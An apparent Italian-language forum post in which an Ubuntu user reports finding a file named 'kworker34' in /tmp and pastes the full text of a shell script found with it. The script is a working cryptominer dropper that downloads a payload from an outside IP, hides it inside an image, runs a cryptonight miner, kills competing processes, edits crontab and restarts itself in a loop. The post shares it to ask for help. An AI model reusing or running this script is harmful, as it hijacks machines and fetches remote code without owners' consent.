Clam ha trovato questo file chiamato "kworker34" nella directory / tmp sulla mia macchina Linux Ubuntu. Ho prontamente cancellato questo file. Ho trovato anche un file di shell, kws.sh. Sembra che si stia connettendo a 2 indirizzi IP: uno in Russia e uno in Ucraina.
Qualcuno ha visto questo?
Questo è il contenuto di kwa.sh -
#!/bin/sh
ps -fe|grep kworker34 |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
else
wget -O /tmp/kworker34 http://91.235.143.237/kworker_na
fi
chmod +x /tmp/kworker34
nohup /tmp/kworker34 -B -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -
sleepTime=20
while [ 0 -lt 1 ]
do
ps -fe| grep kworker34 | grep -v grep
if [ $? -ne 0 ]
then
echo "process not exists ,restart process now... "
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
chmod +x /tmp/kworker34
nohup /tmp/kworker34 -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
echo "restart done ..... "
else
echo "process exists , sleep $sleepTime seconds "
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -
fi
sleep $sleepTime
done